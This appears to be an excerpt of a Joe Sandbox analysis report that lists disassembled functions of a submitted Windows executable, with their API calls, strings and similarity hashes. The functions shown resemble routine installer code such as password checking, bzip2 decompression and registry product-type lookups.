                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                                                      • String ID: [Paused]
                                                                                                      • API String ID: 1715372110-4230553315
                                                                                                      • Opcode ID: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                                                                      • Instruction ID: cc82e29175726c0716c689c1ffa83d11e9869aeff1ced20ba9c80888b84e3111
                                                                                                      • Opcode Fuzzy Hash: a723b0617cbdde8b0455b730e79db8c0792bcf361dff27c4d69091156c9f8888
                                                                                                      • Instruction Fuzzy Hash: 013196309082489EDB11DBB5EC81FDEBBB8DB49314F5540B7F800E7292D67C9909CB69
                                                                                                      Function 0046B758 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCursor.USER32(00000000,0046B897), ref: 0046B814
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0046B822
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B897), ref: 0046B828
                                                                                                      • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B832
                                                                                                      • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B838
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$LoadSleep
                                                                                                      • String ID: CheckPassword
                                                                                                      • API String ID: 4023313301-1302249611
                                                                                                      • Opcode ID: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                                                                      • Instruction ID: aec6a0205c5a75bc54f0fc291e1a1f9730d999611bc1887dd1e74dc6007ab6bd
                                                                                                      • Opcode Fuzzy Hash: 653d9654f76fc9f2c348947714f395caa5fd1a5bea1654e8e7fe328d35dfe1b3
                                                                                                      • Instruction Fuzzy Hash: 333164346406049FD711EB69C889F9E7BE4EF49304F5580B6F844DB3A2D778AD40CB99
                                                                                                      Function 00477B88 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00477AB0: GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                                        • Part of subcall function 00477AB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                                        • Part of subcall function 00477AB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                                      • SendMessageA.USER32(00000000,0000004A,00000000,00477F42), ref: 00477BBD
                                                                                                      • GetTickCount.KERNEL32 ref: 00477C02
                                                                                                      • GetTickCount.KERNEL32 ref: 00477C0C
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477C61
                                                                                                      Strings
                                                                                                      • CallSpawnServer: Unexpected response: $%x, xrefs: 00477BF2
                                                                                                      • CallSpawnServer: Unexpected status: %d, xrefs: 00477C4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                      • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                      • API String ID: 613034392-3771334282
                                                                                                      • Opcode ID: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                                      • Instruction ID: 65d184c56696bd8d6baefe4a5ac293f093c2dd543b1706e930bc299cdf77f89e
                                                                                                      • Opcode Fuzzy Hash: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                                      • Instruction Fuzzy Hash: B131A474B042149ADB11EBB988867EEB6A09F48304F90C47AF548EB392D67C9E41879D
                                                                                                      Function 00459AE8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00459BA3
                                                                                                      Strings
                                                                                                      • Failed to load .NET Framework DLL "%s", xrefs: 00459B88
                                                                                                      • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00459BAE
                                                                                                      • Fusion.dll, xrefs: 00459B43
                                                                                                      • CreateAssemblyCache, xrefs: 00459B9A
                                                                                                      • .NET Framework CreateAssemblyCache function failed, xrefs: 00459BC6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                      • API String ID: 190572456-3990135632
                                                                                                      • Opcode ID: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                                                                      • Instruction ID: 1db31b6b51e2e068c3f61674d824012408e1fbc1d182cf764eafebb5ab4ea00f
                                                                                                      • Opcode Fuzzy Hash: edece01ff0b44ec29f5677049ed357158d3b305d3ba0728d372a41e2f192b5a4
                                                                                                      • Instruction Fuzzy Hash: EF318970E00619EBDB01EFA5C88169EB7B8AF44315F50857BE814E7382D738AE09C799
                                                                                                      Function 0041C158 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                                      • GetFocus.USER32 ref: 0041C178
                                                                                                      • 73A0A570.USER32(?), ref: 0041C184
                                                                                                      • 73A08830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                                                      • 73A022A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                                      • 73A08830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                                                      • 73A0A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A08830$A022A480A570BitsFocusObject
                                                                                                      • String ID:
                                                                                                      • API String ID: 1424713005-0
                                                                                                      • Opcode ID: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                                                      • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                                                      • Opcode Fuzzy Hash: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                                                      • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                                                      Function 00418C64 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                                      • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                                      • 6F522980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                                        • Part of subcall function 004099C0: 6F51C400.COMCTL32(0049B628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                                                      • 6F58CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                                      • 6F58C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                                      • 6F58CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                                      • 6F520860.COMCTL32(0049B628,00418D1F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem$C400C740F520860F522980
                                                                                                      • String ID:
                                                                                                      • API String ID: 2856677924-0
                                                                                                      • Opcode ID: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                                                      • Instruction ID: e0b43fe86d74620756cf035266125a11838772e9d6ef4bcae2e69295d5b8951d
                                                                                                      • Opcode Fuzzy Hash: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                                                      • Instruction Fuzzy Hash: A11149B1744204BBEB10EBA9DC83F5E73B8DB48704F6044BAB604E72D2DB799D409759
                                                                                                      Function 004836EC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004837A4), ref: 00483789
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                      • API String ID: 47109696-2530820420
                                                                                                      • Opcode ID: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                                                                      • Instruction ID: 8316402a246994b7737153b66ed252a9f16b12b2be78e08e0fa98e077eb8f510
                                                                                                      • Opcode Fuzzy Hash: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                                                                      • Instruction Fuzzy Hash: 0311B1B4704244AADB10FF65CC52B5E7AE9DB41B19F60C87BA400A7282EB38CA05875C
                                                                                                      Function 00494ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,?,?,00000000), ref: 00494EE9
                                                                                                        • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00494F0B
                                                                                                      • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495489), ref: 00494F1F
                                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 00494F41
                                                                                                      • 73A0A480.USER32(00000000,00000000,00494F6B,00494F64,?,00000000,?,?,00000000), ref: 00494F5E
                                                                                                      Strings
                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494F16
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                      • API String ID: 1435929781-222967699
                                                                                                      • Opcode ID: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                                                                      • Instruction ID: 6f18d4fe6cef93123b0455e30b82395b7dbfc0c8f911bccc88a8e51c4d6277b1
                                                                                                      • Opcode Fuzzy Hash: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                                                                      • Instruction Fuzzy Hash: 95018476A04609BFEB00DBA9CC41F5EB7ECDB89704F51447AB600E7281D678AE018B28
                                                                                                      Function 0041B472 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                      • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectSelect$Delete$Stretch
                                                                                                      • String ID:
                                                                                                      • API String ID: 1458357782-0
                                                                                                      • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                                      • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                                                      • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                                      • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                                                      Function 004233A4 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCursorPos.USER32 ref: 004233BF
                                                                                                      • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                                      • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                                      • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                                      • SetCursor.USER32(00000000), ref: 00423423
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1770779139-0
                                                                                                      • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                                      • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                                                      • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                                      • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                                                      Function 00494CFC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494D0C
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494D19
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494D26
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                      • API String ID: 667068680-2254406584
                                                                                                      • Opcode ID: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                                                                      • Instruction ID: 42226921e916c2e61715a17367c32eae2b2292ab525ca03b869d6a68ec0a34c4
                                                                                                      • Opcode Fuzzy Hash: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                                                                      • Instruction Fuzzy Hash: 6CF0F69AB41B1466DA2025B68C81F7B698CCFD1B71F050337BE04A7382ED9D8D0642AD
                                                                                                      Function 0045D9EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(02380000,BZ2_bzDecompressInit), ref: 0045D9F5
                                                                                                      • GetProcAddress.KERNEL32(02380000,BZ2_bzDecompress), ref: 0045DA05
                                                                                                      • GetProcAddress.KERNEL32(02380000,BZ2_bzDecompressEnd), ref: 0045DA15
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                      • API String ID: 190572456-212574377
                                                                                                      • Opcode ID: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                                                                      • Instruction ID: e47ea2fb967bc5a05fa6d8d3c64fcba096cc564050e4d812c51f788cc71ed1ca
                                                                                                      • Opcode Fuzzy Hash: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                                                                      • Instruction Fuzzy Hash: 2BF030B0D05300DFEB24DFB29CC372336959BA4316F14803B9A0D96267D278088CCE2C
                                                                                                      Function 0042EA2C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480D8E), ref: 0042EA45
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
                                                                                                      • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA5C
                                                                                                        • Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                                                        • Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                                        • Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                                                      • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA70
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
